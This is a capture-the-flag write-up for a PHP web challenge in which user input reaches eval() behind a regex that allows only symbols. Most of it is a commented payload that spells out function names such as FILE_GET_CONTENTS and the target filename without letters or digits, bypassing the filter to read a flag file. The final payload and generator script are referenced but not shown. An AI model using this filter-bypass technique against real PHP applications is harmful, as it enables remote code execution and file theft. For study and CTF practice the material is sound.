Jailoo Warmup

Web, 442 points


Get the flag in FLAG.PHP.


Source code is given and is at ./jailoo.php


    if(preg_match_all('/^(\$|\(|\)|\_|\[|\]|\=|\;|\+|\"|\.)*$/', $cmd, $matches)){
        echo "<div class=\"success\">Command executed !</div>";

What interests us from the source code is that we have an eval function call for our input if our input respects the regex /^(\$|\(|\)|\_|\[|\]|\=|\;|\+|\"|\.)*$/. eval function makes it possible to call a PHP function, hence a potential RCE here. At first, it reminded me from a Web challenge from root-me.org, I had a lead: as we have to read a PHP file content, I thought directly of file_get_contents, show_source and system functions. We have to note that PHP functions are case insensitive.

The main idea is explained at https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/ and I used a variation of his method 2 to solve this task.

First, I was lazy and decided to start from my payload from the Root Me challenge. Here is my commented version payload, so you can compare with securityonline article and better understand:

$_=@"$_"; // $_='Array';
$_=$_['_'=='[']; // $_=$_[0];
// $___=$_; // A
$__++;$__++;$__++;$__++;$__++; // F
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // I
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // L
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++; // E
$___.=$__; // append the variable
$__=$_; // reset the variable

$__++;$__++;$__++;$__++;$__++;$__++; // G
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++; // E
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__; // append the variable
$__=$_; // reset the variable

$__++;$__++; // C
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // N
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++; // E
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // N
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$___.=$__; // append the variable
$__=$_; // reset the variable

$__++;$__++;$__++;$__++;$__++; // F
$____.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // L
$____.=$__; // append the variable
$__=$_; // reset the variable
$____.=$__; // A
$__++;$__++;$__++;$__++;$__++;$__++; // G
$____.=$__; // append the variable
$__=$_; // reset the variable
$____.="."; // .
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++; // H
$____.=$__; // append the variable
$__=$_; // reset the variable
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__; // append the variable
$__=$_; // reset the variable
$____.='"'; // append '

$___($____); // FILE_GET_CONTENTS('FLAG.PHP')

I realized then that I had to remove characters such as ' @. I crafted it manually for a time, discovered that FILE_GET_CONTENTS returned me an error, SHOW_SOURCE and SYSTEM as well. These functions were disabled. What a struggle. Finally we decided with SHRECS to automate the generation of the payload with a script, we should have done that from the beginning. Thanks to @face0xff for it.

Finally, after scripting, we remembered readfile function. Final payload is below:


Then we flag:

   <div class="card-text">
               <form action="" method="post">
              <div class="form-group">
                <textarea name="cmd" class="form-control" id="textarea" rows="4"></textarea>
              <button type="submit" name="submit" class="btn btn-primary">execute</button>
    <div class="success">Command executed !</div>


Payload generator is at ./exploit.py.

results matching ""

    No results matching ""